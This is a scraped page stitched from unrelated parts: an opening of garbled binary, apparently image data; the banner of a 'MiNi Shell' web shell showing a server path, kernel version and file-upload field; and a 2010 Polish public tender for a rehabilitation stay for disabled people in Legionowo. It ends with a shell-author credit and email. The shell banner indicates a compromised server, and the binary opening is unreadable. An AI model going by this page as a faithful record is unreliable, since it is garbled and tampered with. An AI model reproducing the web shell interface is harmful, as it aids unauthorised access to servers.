JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101123/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101123/379888-N-2010.html

<p class="kh_header"><b>Legionowo: Organizacja i przeprowadzenie turnusu rehabilitacyjnego z przeprowadzeniem treningu kompetencji i umiejętności społecznych dla osób niepełnosprawnych  i ich opiekunów w ramach projektu -Pokonaj siebie! Udowodnij, że możesz więcej! Edycja 2010.</b><br>
<b>Numer ogłoszenia: 379888 - 2010; data zamieszczenia: 23.11.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Centrum Pomocy Rodzinie w Legionowie , ul. gen. Wł. Sikorskiego 11, 05-120 Legionowo, woj. mazowieckie, tel. 22 784 83 33, faks 22 784 83 33.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.legionowo.pcpr.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja i przeprowadzenie turnusu rehabilitacyjnego z przeprowadzeniem treningu kompetencji i umiejętności społecznych dla osób niepełnosprawnych  i ich opiekunów w ramach projektu -Pokonaj siebie! Udowodnij, że możesz więcej! Edycja 2010..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wartość zamówienia poniżej 193 000 EURO.
1.Przedmiotem niniejszego zamówienia jest zorganizowanie i przeprowadzenie 14 dniowego turnusu rehabilitacyjnego, usprawniająco-rekreacyjnego, szkoleniowego, z programem usprawniająco-rekreacyjnym i szkoleniowym dla osób niepełnosprawnych (40 osób) i ich opiekunów (20 osób) w ośrodku rehabilitacyjnym położonym na terenie Polski na potrzebę projektu Pokonaj siebie! Udowodnij, że możesz więcej! Edycja 2010 realizowanego przez przez Powiatowe Centrum Pomocy Rodzinie w Legionowie. Projekt realizowany jest w ramach Programu Operacyjnego Kapitał Ludzki, działania 7.1. Rozwój i upowszechnienie aktywnej integracji, poddziałania 7.1.2. Rozwój i upowszechnienie aktywnej integracji przez powiatowe centra pomocy rodzinie i jest współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego.
1.
2.Trening kompetencji i umiejętności społecznych ma na celu ćwiczenie aspektów behawioralnych uczestniczek projektu, ze szczególnym zwróceniem uwagi na aspekt motywacyjny, umiejętności radzenia sobie ze stresem, komunikacji, pracy zespołowej, uczenia się optymizmu i asertywności, nabycie większej pewności siebie i wiary we własne możliwości.
3.Usługi powinny być wykonywane zgodnie z przepisami Rozporządzenia Ministra Pracy i Polityki Społecznej z dnia 15 listopada 2007 r. w sprawie turnusów rehabilitacyjnych ( Dz. U. Nr 230, poz. 1694).
4.Wykonawca w ofercie cenowej uwzględnia cenę dla max. liczby uczestników. W szczególnie uzasadnionych przypadkach Zamawiający zastrzega sobie możliwość zmniejszenia liczby osób. 
5.W turnusie uczestniczyć będą osoby z następującymi schorzeniami:
1)laryngologicznym,
2)niedosłuchem,
3)upośledzeniem umysłowym,
4)neurologicznym,
5)układu pokarmowego,
6)porażeniem mózgowym,
7)ortopedycznym,
8)narządu ruchu,
9)psychiatrycznym,
10)schorzeniem moczowo-płciowym,
11)układu krążenia
12)schizofrenią,
13)padaczką,
14)narządu wzroku,
15)zespołem Downa,
16)endokrynologicznym,
17)onkologicznym,
18)kardiologicznym.
Wykaz osób, wraz z rodzajem w/w schorzeń, Zamawiający dostarczy Wykonawcy najpóźniej w dniu podpisania umowy.	
6.Założenia organizacyjne turnusu rehabilitacyjnego:
1)Ogólna poprawa lub podtrzymanie sprawności psychofizycznej;
2)Rozwijanie umiejętności społecznych i samorealizacji uczestników;
3)Poprawa stanu zdrowia, samopoczucia i sprawności fizycznej;
4)Prowadzenie zabiegów leczniczo usprawniających;
5)Wyrabianie zaradności osobistej;
6)Trening asertywności;
7)Wzbogacenie komunikacji interpersonalnej;
8)Podniesienie poczucia własnej wartości;
9)Rozwój umiejętności współpracy, wdrażanie do współdziałania, integracja grupy;
10)Twórcze wykorzystanie własnego potencjału w aktywności społecznej;
11)Umożliwienie pełnego wypoczynku fizycznego i psychicznego;
7.Wykonawca będący organizatorem zapewni uczestnikom turnusu:
1)Kadrę gwarantującą prawidłową organizację turnusu w tym: kierownika turnusu, opiekunów, psychologa i licencjonowanego doradcę zawodowego oraz radcę prawnego;
2)Łączny czas zorganizowanych zajęć indywidualnych i grupowych na turnusie w tym:
a)rehabilitację fizyczną dostosowaną do wieku kuracjuszy, stopnia i rodzaju ich niepełnosprawności zgodnie z potrzebami osób niepełnosprawnych, zabiegi lecznicze;
b)rehabilitację psychiczną w tym: zajęcia socjoterapeutyczne o tematyce zajęć związanych z zagadnieniami dotyczącymi usprawnienia funkcjonowania w kontaktach interpersonalnych, poradnictwo indywidualne i grupowe rozwijające świadomości kuracjuszy na temat indywidualnych schorzeń oraz pogłębianie wiedzy na temat placówek wspomagających osoby niepełnosprawne, pogadanki na temat problemów z jakimi najczęściej stykają się osoby niepełnosprawne, przedstawienie sposobów ich rozwiązywania, rozwijanie u kuracjuszy poczucia własnej wartości oraz sensu życia;
c)zajęcia integracyjno- adaptacyjne w tym: wieczorki zapoznawcze, taneczne, ogniska; 
d)co najmniej 1 wycieczkę wyjazdową, uwzględniającą koszt przejazdu, lokalne atrakcje, cenę biletu zwiedzania do wysokości 20,00 zł/1 uczestnik, suchy prowiant jako rekompensata obiadu;
e)zajęcia kulturalno -oświatowe, dydaktyczne i wychowawczo-profilaktyczne w tym: projekcje filmów, pogadanki profilaktyczne z lekarzem na tematy schorzeń kuracjuszy oraz sposobów na samousprawnianie funkcjonowania własnego organizmu;
f)zajęcia sportowo - rekreacyjne w tym: ćwiczenia, wycieczki piesze krajoznawcze, gimnastyka ogólnorozwojowa, zajęcia rekreacyjne np. na basenie;
3)Trening kompetencji i umiejętności społecznych w tym:
a)zajęcia z psychologiem - co najmniej 8 godzin dydaktycznych;
b)zajęcia z doradcą zawodowym - co najmniej 8 godzin dydaktycznych;
c)zajęcia z radcą prawnym - co najmniej 8 godzin dydaktycznych;
d)zajęcia rehabilitacyjne; min. 2 zabiegi dziennie;
4)Zajęcia z psychologiem, doradcą zawodowym oraz radcą prawnym powinny odbywać w 3 grupach, natomiast zajęcia rehabilitacyjne w systemie indywidualnym. 
5)Wykonawca zobowiązany jest do wystawienia zaświadczeń dla uczestników turnusu osób niepełnosprawnych o odbyciu treningów, zawierających informacje o głównym temacie zajęć, datach odbywania treningów wraz z wykazem poszczególnych zagadnień i podaniem ilości godzin do każdego z nich, a także listę obecności na treningach z każdego dnia. Zaświadczenia oraz lista obecności powinny być oznakowane logotypem Programu Operacyjnego Kapitał Ludzki zgodnie z wzorem przesłanym przez Zamawiającego. Wykonawca zobowiązany jest do przekazania kopii każdego wydanego zaświadczenia Zamawiającemu drogą pocztową na adres Zamawiającego.
6.Ponadto Wykonawca zobowiązuje się do:
1)Zapewnienia opieki medycznej w tym: stałą opiekę pielęgniarską i korzystanie z opieki lekarskiej podczas turnusu.
2)Zakwaterowania w ośrodku w pokojach 2 lub 3 osobowych z pełnym węzłem sanitarnym tj: umywalka, prysznic, wc. Każdy pokój musi być wyposażony w TV oraz czajnik bezprzewodowy (Zamawiający nie dopuszcza zakwaterowania uczestników turnusu w domkach).
3)Całodziennego wyżywienia w skład którego wchodzą: śniadanie, obiad, kolacja w tym:       śniadanie (szwedzki stół,) w godzinach od 7:30 do 9:30: minimum jedno danie ciepłe, przekąski zimne, pieczywo jasne i ciemne, napoje gorące, soki owoce warzywa. Obiad: dwudaniowy z deserem. Kolacja: minimum jedno danie ciepłe, przekąski zimne, pieczywo jasne i ciemne, napoje gorące, soki, owoce, warzywa. Dwie przerwy kawowe (przed południem i po południu): kawa, herbata, woda, soki, ciasto, owoce.
4)Ośrodek, w którym będą zakwaterowani uczestnicy turnusu musi posiadać stołówkę.
5)Ośrodek musi posiadać salę do prowadzenia treningów kompetencji i umiejętności społecznych, przeznaczonej dla jednorazowego użytkowania przez minimum 15 osób, wyposażonej w stoły, krzesła, tablice, ekran projekcyjny, wraz z poczęstunkiem w postaci ciastek, słonych paluszków itp., kawy, herbaty, wody mineralnej, soków owocowych, dostępną wraz z wyposażeniem minimum 6 godz. dziennie dla uczestników turnusu. 
6)Dokonania rekompensaty za śniadanie w dniu rozpoczęcia turnusu dla każdego uczestnika turnusu w formie zamiennika na ognisko z produktami grillowanymi ( np. kiełbasa) a w przypadku złej pogody spotkanie całej grupy np. na świetlicy.
7)Dokonania rekompensaty za kolację w dniu zakończenia turnusu dla każdego uczestnika turnusu w formie zabezpieczenia suchego prowiantu na czas podróży.
8)Transportu uczestników na miejsce turnusu i w drodze powrotnej środkiem transportu przystosowanym dla osób niepełnosprawnych, dostosowanym do przewozu osób z dysfunkcją narządu ruchu poruszających się na wózkach inwalidzkich z WC, klimatyzacją, telewizorem, minibarkiem.
9)Zamawiający wymaga aby opiekun grupy turnusowej Wykonawcy odebrał uczestników z siedziby Zamawiającego w Legionowie i opiekował się nimi podczas podróży.
10)Opłacenia opłaty uzdrowiskowej za wszystkich uczestników turnusu jeśli wymagać będzie tego lokalizacja ośrodka.
11)Całodobowego 14 dniowego ubezpieczenia NNW dla każdego uczestnika turnusu obejmujące dojazd uczestników turnusu z miejsca zamieszkania do miejsca odbywania się turnusu oraz dojazd z miejsca odbywania się turnusu do miejsca zamieszkania. 
Zamawiający zastrzega sobie prawo do dokonania wizji na terenie ośrodka zgłoszonego w dokumentach przetargowych celem określenia zgodności opisu ze stanem faktycznym.
7.Ośrodek przyjmujący osoby niepełnosprawne na turnus rehabilitacyjny musi posiadać ważny wpis do rejestru ośrodków o którym mowa w § 17 Rozporządzenia Ministra Pracy i Polityki Społecznej z dnia 15 listopada 2007 r. w sprawie turnusów rehabilitacyjnych ( Dz. U. z dnia 11 grudnia 2007 r,). Zawiadomienie o wpisie do rejestru ośrodków powinno zawierać informacje o rodzajach realizowanych turnusów rehabilitacyjnych, w tym o turnusie rehabilitacyjnym usprawniająco-rekreacyjnym oraz szkoleniowym. Ośrodek, który jest przystosowany do przyjmowania osób ze schorzeniami takimi jak w ust. 5 niniejszego paragrafu.
8.Zamawiający zastrzega również, iż do obowiązków Wykonawcy będzie należało:
1)Niezwłoczne zawiadomienie Zamawiającego o każdym przypadku przerwania turnusu rehabilitacyjnego przez jego uczestnika.
2)Wystawienie po zakończeniu turnusu rehabilitacyjnego faktury w terminie do 30 dni.
3)Dokonania zwrotu w wysokości kosztów w przypadku rezygnacji osoby niepełnosprawnej z uczestnictwa w turnusie przed jego rozpoczęciem lub stwierdzenia w wyniku kontroli rażących uchybień w zakresie realizacji tego turnusu.
4)Dokonania zwrotu w wysokości proporcjonalnej do liczby niewykorzystanych dni w przypadku skrócenia z przyczyn losowych pobytu osoby niepełnosprawnej na turnusie w wymiarze co najmniej połowy czasu trwania tego turnusu.
5)Ustawienia w widocznym miejscu tablicy informacyjnej o współfinansowaniu ze środków Unii Europejskiej pobytu uczestników na turnusie osób niepełnosprawnych.
6)Przekazanie Zamawiającemu dokumentów określonych w Rozporządzeniu Ministra Pracy i Polityki Społecznej z dnia 15 listopada 2007 roku w sprawie turnusów rehabilitacyjnych (Dz. U. Z 2007r, Nr 230 poz. 1694) w szczególności /Informację o przebiegu turnusu/..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 85.31.25.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 23.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wnoszenia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadania zawiadomienia o ważnym wpisie do rejestru organizatorów turnusów rehabilitacyjnych, poświadczającego, że Wykonawca jest uprawniony do organizowania turnusu rehabilitacyjnego rodzaju usprawniająco-rekreacyjnego i szkoleniowego, dla grupy osób niepełnosprawnych ze schorzeniami takimi jak w ust. 5 paragrafu 3 SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonania w okresie ostatnich trzech lat, przed upływem terminu składania ofert,  co najmniej 3 usług polegających na zorganizowaniu i przeprowadzeniu turnusu rehabilitacyjnego dla minimum 25 osób niepełnosprawnych każda, w tym co najmniej 2 turnusów rodzaju usprawniająco-rekreacyjnych i co najmniej 1 szkoleniowego.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">W celu wykazania, że oferowane usługi odpowiadają wymaganiom określonym przez Zamawiającego w paragrafie 3 SIWZ, Zamawiający żąda:
1.3. Programu pobytu (z uwzględnieniem rodzaju turnusu tj. usprawniająco-rekreacyjnego oraz szkoleniowego (ust. 2 i 6 paragrafu 3 SIWZ) oraz organizacji czasu wolnego)</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Dopuszczalne są następujące rodzaje i warunki zmiany treści umowy:
1) zmiana kwoty podatku VAT oraz wynagrodzenia przysługującego Wykonawcy za cały przedmiot umowy.
2) zmniejszenie wynagrodzenia określonego w § 10 ust. 1.
2. Zmiany umowy przewidziane w ust. 1 dopuszczalne są na następujących warunkach:
ad pkt 1) - kwota podatku VAT oraz wynagrodzenie ulegną zmianie odpowiednio do przepisów prawa wprowadzających zmianę stawki podatku VAT;
ad pkt 2) - zmniejszenie wynagrodzenia w przypadku uczestniczenia w turnusach
mniejszej, niż określona w § 2 umowy, liczby uczestników turnusu o cenę brutto za pobyt jednego uczestnika (osoby niepełnosprawnej lub opiekuna);</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.legionowo.pcpr.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dokumentację przetargową można otrzymać w POWIATOWYM CENTRUM POMOCY RODZINIE w Legionowie, ul. gen. Wł. Sikorskiego 11, 05-119 Legionowo, pokój 205 lub za zaliczeniem pocztowym..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.12.2010 godzina 10:00, miejsce: siedziba Zamawiającego: POWIATOWYM CENTRUM POMOCY RODZINIE, ul. gen. Wł. Sikorskiego 11, 05-119 Legionowo, w pok. nr 201..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Program Operacyjny Kapitał Ludzki projekt /Pokonaj siebie! Udowodnij, że możesz więcej! Edycja 2010/..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com